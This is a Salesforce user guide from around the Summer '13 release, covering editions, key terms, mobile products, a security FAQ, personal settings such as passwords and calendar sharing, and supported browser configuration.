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Welcome, Salesforce Users
Available in: All Editions

Welcome to Salesforce! This documentation, designed for end users and administrators, introduces Salesforce and its key
concepts, provides an overview of products and editions, and guides you through setting yourself up as a user. You’ll also find
information about common tasks you’ll perform in Salesforce—like using basic Chatter features, running reports, or searching
Salesforce for the information or records you need. For details about specific Salesforce features, such as sales, service, Chatter,
or analytics; or guidance on setting up Salesforce, see Learning About Salesforce Features or go to http://www.salesforce.com/.

GET TO KNOW SALESFORCE PRODUCTS

What’s New in Salesforce?
Current Release
The latest release includes new features for sales, support, marketing, and Chatter users as well as enhancements to the platform.
For more information, visit the Summer ’13 community page.

For a complete listing of new features along with implementation tips and best practices, see:

• Summer ‘13 Release Notes
• Force.com Connect for Lotus Notes Release Notes
• Force.com Connect for Office Release Notes
• Force.com Connect Offline Release Notes
• Force.com Connect for Outlook Release Notes
• Salesforce for Outlook Release Notes
• Database.com Release Notes

Past Releases
For information about new features introduced in previous releases, see:

• Spring ’13 Release Notes
• Winter ’13 Release Notes
• Summer ’12 Release Notes
• Spring ’12 Release Notes

LEARN SALESFORCE BASICS
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• Winter ’12 Release Notes
• Summer ’11 Release Notes
• Spring ’11 Release Notes
• Winter ’11 Release Notes
• Summer ’10 Release Notes
• Spring ’10 Release Notes
• Winter ’10 Release Notes
• Summer ’09 Release Notes
• Spring ’09 Release Notes
• Winter ’09 Release Notes
• Summer ’08 Release Notes
• Spring ’08 Release Notes
• Winter ’08 Release Notes
• Summer ’07 Release Notes
• Spring ’07 Release Notes
• Force.com Mobile 7.0 for BlackBerry Release Notes
• Force.com Mobile 6.1 for Windows Mobile 5 Release Notes
• Winter ’07 Release Notes
• Summer ’06 Release Notes
• Winter ’06 Release Notes
• Force.com Mobile 6.0 Release Notes
• Summer ’05 Release Notes
• Winter ’05 Release Notes
• Summer ’04 Release Notes
• Spring ’04 Release Notes
• Winter ’04 Release Notes

Product Overview
Your Salesforce edition determines which features and functionality you can access. To find out which edition you’re using,
look at the browser tab or title.

Welcome to the award-winning cloud-computing service— designed to help you manage your customer relationships, integrate
with other systems, and build your own applications. Salesforce includes the following products and services.

Salesforce Applications

Salesforce includes prebuilt applications (or “apps”) for customer relationship management (CRM) ranging from sales
force automation to partner relationship management, marketing, and customer service.

Force.com Platform

The Force.com platform is the first platform as a service (PaaS), enabling developers to create and deliver any kind of
business application entirely on demand and without software. The platform also includes easy-to-us, point-and-click
customization tools to help you create solutions for your unique business requirements, without any programming
experience.
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Database.com

Database.com is a multitenant cloud database service that’s designed to store data for mobile, social enterprise applications.
You can use Database.com as the back-end database for applications that are written in any language and run on any
platform or mobile device. Database.com's built-in social computing infrastructure and native support for building
sophisticated REST-based APIs enable you to create employee-facing, native mobile and social apps.

AppExchange

AppExchange is a marketplace featuring hundreds of cloud applications created by salesforce.com customers, developers,
and partners. Many of the applications are free and all of them are pre-integrated with Salesforce, enabling you to easily
and efficiently add functionality.

Salesforce.com Community

Salesforce.com provides training, support, consulting, events, best practices, and discussion boards to help you be
successful. Visit Salesforce.com Community.

Key Concepts and Terms
Available in:

As you’re getting up to speed with Salesforce, it’s helpful to learn some key concepts and terms. They’ll come up frequently
as you interact with the product, our documentation, and our service professionals. The concepts here will help you understand
how Salesforce works. And the terms will help you understand some of its main components.

Concepts

DefinitionConcept

Salesforce’s name for a loose federation of features that help
you accomplish certain types activities, such as selling products,

Cloud

supporting your customers, or collaborating with your
coworkers. Two common examples you’ll come across are
“Service Cloud” and “Sales Cloud”.

Technology that enables Internet-based services that let you
sign up and log in through a browser. Salesforce delivers its

Cloud Computing

service in the cloud. Other familiar cloud computing services
include Google Apps and Amazon.com.

Software delivered not by traditional means (such as on disk)
but in the cloud, as a service. There’s nothing to download or
install, and updates are automatic.

Software as a Service / SaaS

Salesforce’s term for its companywide commitment to building
and delivering the most secure, fast, and reliable cloud-based
service available.

Created to enhance customer success,
trust.salesforce.com is a systems status website giving

Trust / trust.salesforce.com

Salesforce customers and the community access to real-time
and historical system performance information and updates,

3

Key Concepts and TermsGet to Know Salesforce Products

http://www.salesforce.com/community/


DefinitionConcept

incident reports and maintenance schedules across all its key
system components. .

trust.salesforce.com is free of charge to all members
of the Salesforce community

Terms

DefinitionTerm

Short for “application.” A collection of components such as
tabs, reports, dashboards, and Visualforce pages that address

App

a specific business need. Salesforce provides standard apps
such as Sales and Call Center. You can customize the standard
apps to match the way you work.

One of several bundles of Salesforce products and services,
each geared toward a different set of business needs. All

Edition

Salesforce editions share the same look and feel, but they vary
by feature, functionality, and pricing.

A definition of a specific type of information you can store in
Salesforce. For example, the Case object allows you to store

Object

information about customer inquiries. For each object, your
organization will have multiple, specific records.

Salesforce comes with lots of standard objects, but you can
create custom objects, as well.

A deployment of Salesforce that has a defined set of licensed
users. Your organization includes all of your data and
applications, and is separate from all other organizations.

Organization / Org

A collection of fields that store information about a specific
item of a specific type (represented by an object), such as a

Record

contact, an account, or an opportunity. For example, you might
have a contact record to store information about Joe Smith,
and a case record store information about his training inquiry.

Salesforce releases new products and features three times per
year, and releases are identified by season—Winter, Spring,

Release

and Summer—along with the calendar year. For example:
“Winter ’13”.

Each time we produce a release, in the Salesforce release notes,
we document new features and products that are generally
available or in beta release, plus all changes to existing features
and products. To find and download the release notes, just ,
search for “Release Notes” in the Salesforce online help.

The name of Salesforce’s cloud computing CRM service.Salesforce

The company name.salesforce.com
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EDITIONS

Salesforce Edition Overview
Your Salesforce edition determines which features and functionality you can access. To find out which edition you’re using,
look at the browser tab or title.

Salesforce.com offers several bundles of its products and services, each geared toward a different set of business needs. These
bundles, called editions, all share the same look and feel, but they vary by feature, functionality, and pricing. For example, a
feature that is available in Professional Edition for an additional fee may be included in Enterprise Edition. You might choose
to start with a more basic edition, then upgrade later as you grow your business.

For a comparison chart of editions and their features, see the Salesforce Pricing and Editions page.

Note:  The Salesforce online help describes all generally available features, including those that are not available in
all editions. To find out whether a feature is available in your edition, search for the feature in the help, they check
out the “Available in:” table at the top of any topic you find for that feature.

See Also:
Salesforce Mobile Products Overview

Contact Manager Edition
Salesforce

Contact Manager is designed for small businesses and provides access to key contact management features including accounts,
contacts, activities, calendars, notes and attachments, and reports. Contact Manager also provides straightforward and easy-to-use
customization options. For more information about Contact Manager features, visit the Salesforce Pricing & Editions page.

See Also:
Salesforce Edition Overview

Group Edition
Salesforce Group Edition is designed for small businesses and workgroups with a limited number of users. Group Edition
users can manage their customers from the start of the sales cycle through closing the deal to providing customer support and
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service. Group Edition offers access to accounts, contacts, opportunities, leads, cases, dashboards, and reports. For more
information about Group Edition features, visit the Salesforce Pricing & Editions page.

See Also:
Salesforce Edition Overview

Developer Edition
Salesforce

Developer Edition provides access to the Force.com platform and API. It allows developers to extend the Salesforce system,
integrate with other applications, and develop new tools and applications. Developer Edition provides access to many of the
features available with Enterprise Edition.

Salesforce.com does not provide technical support for Developer Edition. You can solicit help from the developer community
message boards available to registered users via the Force.com developer website - developer.force.com. Documentation for
Developer Edition is available from the Technical Library.

See Also:
Salesforce Edition Overview

Personal Edition
Note:  Personal Edition isn't available to new organizations. Existing organizations that have already set up Personal
Edition continue to have access. In addition, Personal Edition organizations that signed up after June 2009 don’t
have access to opportunities.

Personal Edition is a CRM solution designed for an individual sales representative or other single user. Personal Edition
provides access to key contact management features such as accounts, contacts, and synchronization with Microsoft Outlook®.
It also provides sales representatives with sales tools such as opportunities.

See Also:
Salesforce Edition Overview

Professional Edition
Salesforce Professional Edition is designed for businesses who need full-featured CRM functionality. Professional Edition
includes straightforward and easy-to-use customization, integration, and administration tools to facilitate any small- to

6

Developer EditionEditions

http://www.salesforce.com/crm/editions-pricing.jsp
http://developer.force.com
http://wiki.developerforce.com/index.php/Documentation


mid-sized deployment. For more information about Professional Edition features, visit the Salesforce Pricing & Editions
page.

See Also:
Salesforce Edition Overview

Enterprise Edition
Salesforce Enterprise Edition is designed to meet the needs of large and complex businesses. In addition to all of the functionality
available in Professional Edition, Enterprise Edition organizations get advanced customization and administration tools that
can support large-scale deployments. Enterprise Edition also includes access to the Web services API so you can easily integrate
with back-office systems. For more information about Enterprise Edition features, visit the Salesforce Pricing & Editions
page.

See Also:
Salesforce Edition Overview

Unlimited Edition
Salesforce Unlimited Edition is salesforce.com's flagship solution for maximizing CRM success and extending that success
across the entire enterprise through the Force.com platform. Unlimited Edition customers benefit from new levels of platform
flexibility for managing and sharing all of their information on demand.

Unlimited Edition includes all Enterprise Edition functionality plus Premier Support, full mobile access, unlimited custom
apps, increased storage limits, and more. For more information about Unlimited Edition features, visit the Salesforce Pricing
& Editions page.

See Also:
Salesforce Edition Overview

Database.com Edition
Database.com is a multitenant cloud database service that’s designed to store data for mobile, social enterprise applications.
You can use Database.com as the back-end database for applications that are written in any language and run on any platform
or mobile device. Database.com's built-in social computing infrastructure and native support for building sophisticated
REST-based APIs enable you to create employee-facing, native mobile and social apps.

As a Salesforce user, you’re already using Database.com when you’re performing tasks such as creating custom objects, managing
security, or importing data with the Force.com platform and API.
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A standalone version of Database.com is available for developers who want to create applications that leverage other languages,
platforms, and devices.

See Also:
Salesforce Edition Overview

Salesforce Mobile Products Overview
Salesforce.com provides several mobile apps to keep you connected and productive, no matter where you are.

Offline Support?Supported Mobile
Devices

Supported Salesforce
Editions

DescriptionProduct

No.Free for customers
using:

Collaborate in Chatter
from your mobile device
without having to use a
browser.

Chatter Mobile • Android phones and
tablets

However, Android and
Apple devices retain a
cached version of your

• Apple iPad
• Group Edition • Apple iPhone
• Professional Edition

You can monitor your
feed, post updates and

• Apple iPod Touch feed. You can also
access any data

• Enterprise Edition • BlackBerry
smartphones• Unlimited Edition

comments, and upload
photos, files, and links.

previously downloaded
from the app.

You can also email, call,
or text people directly
from their Chatter
profiles. And the app
gives you instant
notifications to keep
you up-to-date on
important activities.

Limited.Free for customers
using:

Access your dashboards
and their source reports
from your iPad.

Mobile Dashboards for
iPad

• Apple iPad

Dashboards and reports
that you access from the• Enterprise Edition

You can see any
dashboard you have

app are cached and
available for offline
viewing only.

• Unlimited Edition

• Developer Edition
access to, as well as view
individual dashboard

• Any organization
with REST API
enabled

components, highlight
their values, and drill
into reports for each.
You can also email a
dashboard or
component to others,
and post and comment
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Offline Support?Supported Mobile
Devices

Supported Salesforce
Editions

DescriptionProduct

on dashboard Chatter
feeds.

YesA free, limited version
is available for all

Access and update
Salesforce data from
your smartphone.

Salesforce Classic • Android phones and
tablets

• Apple iPhoneSalesforce customers
except for • BlackBerry

smartphonesYou can view your
dashboards, run simple
reports, log calls and

Database.com
organizations

Full version requires
mobile licenses and is
available for:

emails, keep track of
your activities, and
create, edit, and delete
records. Most standard

• Professional EditionSales objects and some
Service objects are • Enterprise Edition

• Unlimited Editionavailable. And if you’re
using the full version, • Developer Edition
custom objects and
configurations are also
supported.

Limited.Free for customers
using:

Access and update
Salesforce data from an
interface that’s

Salesforce Touch • Apple iPad

• Apple iPhone
A Salesforce Touch
pilot feature allows you• Contact Manager

Edition
optimized for
navigating and working

to view your recently
accessed records when• Group Editionon your touchscreen

mobile device.
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Offline Support?Supported Mobile
Devices

Supported Salesforce
Editions

DescriptionProduct

You can view, edit, and
create records, manage

your device isn’t
connected.

• Professional Edition

• Enterprise Edition
your activities, view • Unlimited Edition
your dashboards, and
use Chatter. Salesforce

• Developer Edition

Touch supports many
standard Sales and
Service objects and all
of your organization’s
custom objects. And
you can change between
apps, just like in the full
Salesforce site.

See Also:
Salesforce Classic Overview
Salesforce Touch Overview
Salesforce Edition Overview

SECURITY BASICS

Security FAQ
• How can I be sure my data is secure in Salesforce?

• How can I be sure my data won’t be lost?

• How can I be assured my data will be kept private?

• Can I automatically back up my data in Salesforce?

• Does salesforce.com use my data for internal purposes?

• What happens when the system goes down?

How can I be sure my data is secure in Salesforce?
When you log in, the URLs used to access your data are all preceded with https:// instead of http://, which indicates that a
secure connection has been established. Furthermore, whenever your password is changed or reset, or when you log in from
a computer you have not used to access Salesforce before, you may have to activate your computer to successfully log in to
Salesforce. Activating your computer allows Salesforce to verify your identity and prevent unauthorized access.
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How can I be sure my data won’t be lost?
We back up your data with a variety of methods to ensure that your organization does not experience any data loss. Every
transaction is stored to RAID disks in real-time with archive mode enabled, allowing the database to recover all transactions
prior to any system failure. Every night all data is backed up to a separate backup server and high speed automatic tape library.
The backup tapes are cloned as an additional precautionary measure, and the cloned tapes are transported to an off-site,
fireproof vault twice a month. In addition, the facility that stores our servers is architecturally designed to withstand catastrophic
events and earthquakes up to 8.0 on the Richter scale.

How can I be assured my data will be kept private?
We are committed to keeping your data private and secure. For a greater understanding of the legal obligations salesforce.com
adheres to regarding data privacy, refer to the Privacy Statement, as well as the Terms of Use agreement. You can view both
items by clicking the relevant link below the copyright at the bottom of any page.

Can I automatically back up my data in Salesforce?
Yes, weekly export service provides you with .csv files of all objects and attachments within Salesforce. You can set up this
service to automatically perform a data export each week.

Does salesforce.com use my data for internal purposes?
No. As outlined in the Privacy Statement, salesforce.com does not review, share, distribute, print, or reference your data except
as provided in the salesforce.com Terms of Use, or as may be required by law. For exact information, refer to the Privacy
Statement, as well as the Terms of Use agreement. You can view both items by clicking their links below the copyright at the
bottom of any page.

What happens when the system goes down?
Salesforce.com builds redundancy into all systems to minimize system failures that could be perceived as customer outages.
All components are proactively monitored and managed so faults are detected before system outages. While there may
occasionally be system outages due to issues beyond our control, we employ numerous escalation procedures to notify the
proper personnel in the event of a system outage, and remedy issues as quickly as possible.
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UPDATES

Checking for Desktop Client Updates
Available in: All Editions except for Database.com

User Permissions Needed

“On, updates w/alerts”

OR

“On, must update w/alerts”

on your profile

To view client update alerts:

Desktop clients such as Connect for Outlook and Connect Offline integrate Salesforce with your PC. Your administrator
controls which desktop clients you are allowed to install.

If you have access to see Home tab alerts, and you’ve logged in to a client in the past, you’ll see an alert banner on your Home
tab when a new version of a client is available.

You can also see which clients are installed on your computer and check for updates on your own. Just follow these steps.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select Desktop Integration > Check for Updates.
• If you clicked My Settings, select Desktop Add-Ons > Check for Updates.

3. From the table, review the names and version numbers of available desktop clients.
4. If you are using Internet Explorer, click the correct desktop client and then click Install Now to install a client. If you are

using another browser such as Mozilla Firefox, click Download Now to save the installer file to your computer. Then
double-click the saved file to run the installer program.

After you install the update, you’ll continue to see the alert banner on your Home tab until you log in through the newly
updated client.

See Also:
Viewing Messages and Alerts
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GET STARTED IN SALESFORCE

Finding Your Personal Settings
Salesforce includes personal settings options to help you personalize your experience. Depending on your organization, these
settings are located in Personal Setup or My Settings.

Available in: All editions except Database.com.

1. At the top of any Salesforce page, click the down arrow next to your name.

Depending on your organization’s user interface settings, you should see either Setup or My Settings in the menu.

2. From the menu under your name, click Setup or My Settings.
3. Do one of the following:

• If you clicked Setup, look on the left side of the page and click a menu item to display its sub-menu, then click the
item you want.

• If you clicked My Settings, look on the left side of the page and click a menu item under My Settings to display its
sub-menu, then click the item you want.
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Tip:  To quickly find a page, type the first few characters of its name in the Quick Find box. As you type, pages
that match your search terms appear in the menu. For example, to find the Personal Information page, type pers
in the Quick Find box.

See Also:
Finding the Setup Menu

Finding the Setup Menu
Depending on your organization’s user interface settings, you access the Setup menu from the drop-down menu under your
name or from the user interface header.

Available in: All editions except Database.com.

Salesforce includes many options for setting up, maintaining, and customizing your organization. Your organization may also
have options for building, packaging, and distributing your own apps. These options are all available via the Setup menu. If
you’re a Salesforce administrator or developer, you’ll use the Setup menu frequently. Your organization’s user interface settings
determine how everyone in your organization accesses this menu.

1. Look at the top of any Salesforce page.

• If you see Setup in the user interface header, click it.
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• If you don’t see Setup in the header, click your name, then select Setup.

2. In the Setup menu that appears on the left side of the page, click  next to a menu to expand it, then click the menu item
you want.

Tip:  To quickly find a page, type the first few characters of its name in the Quick Find box. As you type, pages
that match your search terms appear in the menu. For example, to find the Language Settings page, type lang
in the Quick Find box.

See Also:
Finding Your Personal Settings

Understanding Your Administrator's Role
Salesforce administrators are users of Salesforce who have been assigned the System Administrator profile. All organizations
have at least one administrator, but larger ones may have more.
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Administrators have multiple duties, including setting up Salesforce for your organization and making sure it runs smoothly.
They also add and configure users, and aid user productivity by creating custom tools, such as objects, workflows, validation
rules, and reports. Your administrator’s role can be as simple or as complex as your company’s size and structure. In smaller
organizations, the administrator might be someone who also uses Salesforce the way other users do: to sell products or provide
customer service, for example.

There are many Salesforce features and items (such as those detailed in the Learn Salesforce Basics documentation) that you
can modify yourself to suit your own needs. But in some cases, you might want to work with your administrator to help you
get the most out of Salesforce. Here are a few examples.

• You need a custom workflow to find out when a case is closed.

• You need a custom approval process to sign off on employee expenses.

• You need help creating a custom report for your sales region.

• You need a user permission that’s not granted as part of your user profile.

• You have questions about your own or others’ access to records.

• You get an error message that tells you to contact your administrator for help or more information.

How you contact your administrator, and under what circumstances, depends on your company’s internal business policies
and practices.

See Also:
Granting Login Access

DEFINE PERSONAL INFORMATION AND PREFERENCES

Activating Your Computer
Password policies available in: All Editions

Watch a Demo (1:29 minutes)

You might have to activate your computer to successfully log in to Salesforce whenever your password is changed or reset, or
when you log in from a computer you have not previously used to access Salesforce.

Computer activation allows Salesforce to verify your identity and prevent unauthorized access to the service.

1. When prompted on the login page, click Email me a verification code. Salesforce sends an activation email to the email
address specified on your Salesforce Personal Information page.

2. When you receive the email, copy and paste the code into your browser.

The code can be used for up to 24 hours from the time you requested the verification code. After 24 hours, the code expires,
and you must repeat steps 1 and 2 to log in.
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Editing Your Personal Information
The available personal setup options vary according to which Salesforce Edition you have.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information.
• If you clicked My Settings, select Personal > Advanced User Details.

3. To make changes, click Edit.

If you change your email address, a confirmation message will be sent to the new address. You must click the link provided
in that message for the new email address to take effect. This process ensures system security.

4. Click Save.

See Also:
Changing Your Password
User Fields

Changing Your Password
Available in: All Editions

We recommend changing your password periodically to protect the privacy of your data. If your administrator specifies that
user passwords expire on a periodic basis, you’ll be prompted to change your password at the end of each period.

Note:  If you have the “User Single Sign-On” permission, only an administrator can reset your password. Contact
your administrator for assistance.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Change My Password.
• If you clicked My Settings, select Personal > Change My Password.

3. Enter the password information requested.
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4. Click Save.

See Also:
Retrieving Forgotten Passwords
Resetting Your Security Token
Activating Your Computer

Editing Your Language and Locale Settings
Available in: All editions except Database.com

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select My Personal Information > Personal Information, then click Edit.
• If you clicked My Settings, select Personal > Language & Time Zone.

3. Specify these settings as needed:

• For Time Zone, select your primary time zone.
• For Locale, select your country or geographic region.
• For Language, select your primary language. All text and online help appears in the language you select.
• For Email Encoding, select the character set and encoding option for email that you send from Salesforce.

4. Click Save.

See Also:
User Fields

Editing Email Settings
Available in: All Editions except for Database.com

To alter email settings that apply to all outbound emails you send from within the application:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left side of the page, select Email > My Email Settings.
3. Make your changes.
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Note:  In Personal and Developer Editions, a Salesforce-specific tag line is added below your personal signature on
all outbound emails.

Sharing Your Calendar
Available in: Professional, Enterprise, Unlimited, and Developer Editions

You can grant access to other users, personal and public groups, roles, or roles and subordinates to view your calendar.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, click My Personal Information > Calendar Sharing.
• If you clicked My Settings, click Calendars & Reminders > Calendar Sharing.

3. Click Add to share your calendar with others.
4. Use the arrows to add or remove users, roles, or groups to your calendar.
5. Use the Calendar Access drop-down list to specify how you want to share your calendar. Select one of the following:

DescriptionOption

Others can see whether given times are available, but cannot
see any other information about the nature of events in the
calendar.

Hide Details

Others can see whether given times are available, but cannot
see details of events. Other users can insert events in the
calendar.

Hide Details and Add Events

Others can see detailed information about events in the
calendar.

Show Details

Others can see detailed information about events in the
calendar and can insert events in the calendar.

Show Details and Add Events

Others can see detailed information about events in the
calendar, insert events in the calendar, and edit existing
events in the calendar.

Full Access

6. Click Save.

The available Calendar Access options vary depending on the organization-wide calendar sharing level set by your
administrator. Only choices that make your calendar access less restrictive are available. Calendar sharing settings affect the
visibility of items on a calendar, but do not give access to event detail pages.

Note:  Regardless of whether your organization's sharing settings specify using hierarchies, activities associated with
a record are still visible to users above the activity’s assignee in the role hierarchy.
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Setting Record Type Preferences
Available in: Enterprise, Unlimited, and Developer Editions

Set an option to automatically insert your default record type when creating new records. Using this setting, you can bypass
the page prompting you to select a record type. If you have several different record types available to you, you may prefer to
be prompted to select a record type every time you create a new record.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, click My Personal Information > Record Type Selection.
• If you clicked My Settings, click Display & Layout > Set Default Record Types.

3. Check any box to automatically select the default record type when creating records of that type.

Any unchecked boxes indicate that you prefer to be prompted to select a record type.

4. Click Save.

Note:  The Record Type Selection option may not be available because your organization is not using record types
or multiple record types are not available for a particular tab.

Individual checkboxes are only offered when you have more than one record type available for a tab.

If your organization uses person accounts, note that checking the Account box on this page causes one default record
type selection for all types of accounts. It is not possible to set separate default record type selections for business
accounts and person accounts. If you work with both types of accounts, leave the box blank.

GET SET UP FOR THE WAY YOU WORK

BROWSERS

Supported Browsers
Browsers

Salesforce supports these browsers.
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CommentsBrowser

If you use Internet Explorer, we recommend using the latest version. Apply
all Microsoft software updates. Note these restrictions.

Microsoft® Internet Explorer® versions 7, 8,
9, and 10

• The Compatibility View feature in Internet Explorer isn’t supported.

• The Metro version of Internet Explorer 10 isn’t supported.

• Internet Explorer 7 and 8 aren’t supported for the Developer Console.

• Internet Explorer 10 isn’t supported for the Service Cloud console.

• Internet Explorer 7 isn’t supported for Open CTI.

• Internet Explorer 7 isn’t supported for Salesforce CRM Call Center built
with CTI Toolkit version 4.0 or higher.

• Internet Explorer 7 isn’t supported for Force.com Canvas.

For configuration recommendations, see Configuring Internet Explorer on
page 22.

Salesforce.com makes every effort to test and support the most recent version
of Firefox. For configuration recommendations, see Configuring Firefox on
page 23.

Mozilla® Firefox®, most recent stable version

Google Chrome applies updates automatically; salesforce.com makes every
effort to test and support the most recent version. There are no configuration

Google Chrome™, most recent stable version

recommendations for Chrome. Chrome isn’t supported for the Console tab
or the Add Google Doc to Salesforce browser button.

Supported plug-in for Internet Explorer 6 and 7 only. Google Chrome Frame
applies updates automatically; Salesforce supports only the most recent version.

Google Chrome Frame™ plug-in for
Microsoft® Internet Explorer® 6 and 7

For configuration recommendations, see Installing the Google Chrome
Frame™ Plug-In for Microsoft® Internet Explorer® on page 25. Chrome
Frame plug-in isn’t supported for the Service Cloud console or Forecasts.

There are no configuration recommendations for Safari. Apple Safari on iOS
isn’t supported.

Apple® Safari® versions 5.x and 6.x on Mac
OS X

• Safari isn’t supported for the Service Cloud console.

• Safari isn’t supported for Salesforce CRM Call Center built with CTI
Toolkit versions below 4.0.

Recommendations and Requirements for All Browsers

• For all browsers, you must enable JavaScript, cookies, and SSL 3.0.

• Salesforce.com recommends a minimum screen resolution of 1024 x 768 for the best possible user experience. Screen
resolutions smaller than 1024 x 768 may not display Salesforce features such as Report Builder and Page Layout Editor
properly.

• Some third-party Web browser plug-ins and extensions can interfere with the functionality of Chatter. If you experience
malfunctions or inconsistent behavior with Chatter, disable all of the Web browser's plug-ins and extensions and try again.

Certain features in Salesforce—as well as some desktop clients, toolkits, and adapters—have their own browser requirements.
For example:

• Internet Explorer is the only supported browser for:
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Standard mail merge (We don’t support Google Chrome Frame™ plug-in for Internet Explorer because the ActiveX
controls required for mail merge are supported in Internet Explorer only.)

◊

◊ Installing Salesforce Classic on a Windows Mobile device
◊ Connect Offline

• Firefox is recommended for the enhanced page layout editor.
• Browser requirements also apply for uploading multiple files on Chatter.

Discontinued or Limited Browser Support

As of Summer ’12, salesforce.com discontinued support for Microsoft® Internet Explorer® 6. Existing features that have
previously worked in this browser may continue to work through 2014. Note these support restrictions.

• Internet Explorer 6 isn’t supported for:

◊ Chatter
◊ Global search
◊ Answers
◊ Cloud Scheduler
◊ The new user interface theme
◊ Quote Template Editor
◊ Service Cloud console
◊ Salesforce Knowledge
◊ Live Agent
◊ Forecasts
◊ Chatter Answers
◊ Enhanced profile user interface
◊ Site.com
◊ Schema Builder
◊ Joined reports
◊ Enhanced dashboard charting options

Internet Explorer 7 isn’t supported for Site.com and Chatter Messenger. For systems running Microsoft Windows XP, Internet
Explorer versions 7 and 8 with the latest security patches are supported for Chatter Answers.

Configuring Internet Explorer
Available in: All Editions

If you use Internet Explorer, we recommend using the latest version. Apply all Microsoft software updates.

To maximize the performance of Internet Explorer, set the following options in the Internet Options dialog box, which you
can open by clicking Tools > Internet Options:

General Tab

1. From the General tab, click Settings under Browsing History.
2. For the Check for newer versions of stored pages option, select Automatically.
3. For the Disk space to use option , enter at least 50 MB.
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Security Tab

1. From the Security tab, click Custom Level under Internet and scroll to the Scripting section.
2. Make sure the Active Scripting option is enabled. JavaScript depends on this setting being enabled.

Privacy Tab

1. From the Privacy tab, click Advanced.
2. Select the Override automatic cookie handling option.
3. Select the Always allow session cookies option.
4. For the Third-party Cookies option, select Accept.

Advanced Tab

From the Advanced tab, scroll to the Security section and do the following:
• Do not select the Do not save encrypted pages to disk option.

• Select the Use SSL 3.0 option.

Tip:  The Empty Temporary Internet Files folder when browser is closed option causes
the cache to clear when Internet Explorer is shut down. This increases privacy, but may decrease performance.

See Also:
Supported Browsers

Configuring Firefox
Available in: All Editions

Salesforce.com makes every effort to test and support the most recent version of Firefox.

Required Settings
The following settings are required:

1. Click Tools > Options.
2. Enable JavaScript:

a. Go to the Content panel.
b. Select the Enable JavaScript option.

3. Accept cookies:

a. Go to the Privacy panel.
b. For the Firefox will option, select Use custom settings for history.
c. Select the Accept cookies from sites option.
d. Select the Accept third-party cookies option.
e. For the Keep until option, select they expire.
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4. Set encryption protocols:

a. Go to the Advanced panel.
b. Click the Encryption tab.
c. Select the Use SSL 3.0 option.

5. Click OK.

Advanced Settings
Optionally, configure advanced caching preferences to maximize performance:

1. Type about:config in the browser's location bar, and then press Enter.
2. If a warning displays, click I'll be careful, I promise!
3. Search for the following preferences and set them to the recommended value by double-clicking the preference name.

Changes take effect immediately.
4. Change how the browser retains common resources across requests by setting the following caching preferences.

Default ValueRecommended ValuePreference

33browser.cache.check_doc_frequency

50,00050,000 or more; increase to use more hard disk
space

browser.cache.disk.capacity

TrueTruebrowser.cache.disk.enable

FalseTruebrowser.cache.disk_cache_ssl

TrueTruebrowser.cache.memory.enable

TrueTruenetwork.http.use-cache

Note:  You can set some of these preferences by clicking Tools > Options in the Firefox browser. Refer to Firefox
Help for details.

Tip:  Setting privacy.sanitize.sanitizeOnShutdown to “True” causes the cache to clear when Firefox shuts down. This
increases privacy, but may decrease performance.

To view the contents of your cache, type about:cache in the Firefox location bar and press Enter.

Refer to MozillaZine Knowledge Base and Firefox Support Home Page for more information on these and other
preferences.

See Also:
Supported Browsers
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Installing the Google Chrome Frame™ Plug-In for Microsoft®
Internet Explorer®

Available in: All Editions except Database.com

Salesforce supports Google Chrome Frame for Internet Explorer version 6 and 7. Google Chrome Frame enables Internet
Explorer to utilize features such as the new user interface theme and Chatter.

1. In Internet Explorer, go to www.google.com/chromeframe.
2. Click Get Google Chrome Frame  and review the Terms of Service.
3. Click Accept and Install.
4. After the installation is finished, click Close and restart Internet Explorer.

Note:  Disabling Google Chrome Frame in Internet Explorer may result in display errors. Rather than disable Google
Chrome Frame, it’s recommended you uninstall it.

See Also:
Supported Browsers

Understanding Your Access to UI Elements, Records, and
Fields

Available in: All Editions except Database.com

Your administrator can customize many different areas to secure your company's data. Additionally, users in Professional,
Enterprise, Unlimited, and Developer edition organizations can control the access that other users have to their data by sharing
records individually with colleagues.

To determine whether you can access data, review this table:

Access NeededAction

To view a tab: • You must have the “Read” permission on the records within
that tab.

• Make sure you have customized your personal display to
show the tab.

To view a record: • Make sure you have the “Read” permission on the type of
record you want to view.

• Professional, Enterprise, Unlimited, and Developer Edition
organizations can set a sharing model that determines the
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Access NeededAction

access users have to records they do not own. Depending
on your sharing model, the owner may need to share the
record with you if you are not the owner of the record or
above the owner in the role hierarchy.

• Enterprise, Unlimited, and Developer Edition
organizations can use territory management to grant access
to accounts, opportunities, and cases.

To view a field: • Make sure you have the “Read” permission on the type of
record for the field.

• For Enterprise and Unlimited Edition organizations, check
the field-level security; your field-level security settings
may prevent you from seeing the field.

• Check your page layout; depending on your page layout
settings, you may see some fields and not others.

To edit a field: • Make sure you have the “Edit” permission on the type of
record for the field.

• For Enterprise and Unlimited Edition organizations, check
the field-level security; your field-level security settings
may set a field to “Read-Only.”

• Check your page layout; page layouts can set fields to read
only.

To view a related list: • Make sure you have the “Read” permission on the type of
records displayed in the related list.

• Check your page layout; depending on your page layout
settings, you may see some fields and not others.

To view a button or link: • Make sure you have the necessary permission to perform
the action. Buttons and links only display for users who
have the appropriate user permissions to use them.

See Also:
Granting Access to Records
Viewing Which Users Have Access to Your Records
Record Access Levels
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Customizing Your Display
Available in: All Editions except for Database.com

You can customize your Salesforce display through your personal settings.

• Customize which tabs display in your app and in what order

• Customize what displays on your pages

Customizing Your Tabs
Specify which tabs display when you log in, or if you have multiple apps, which tabs display in each app.

Available in: All editions except Database.com

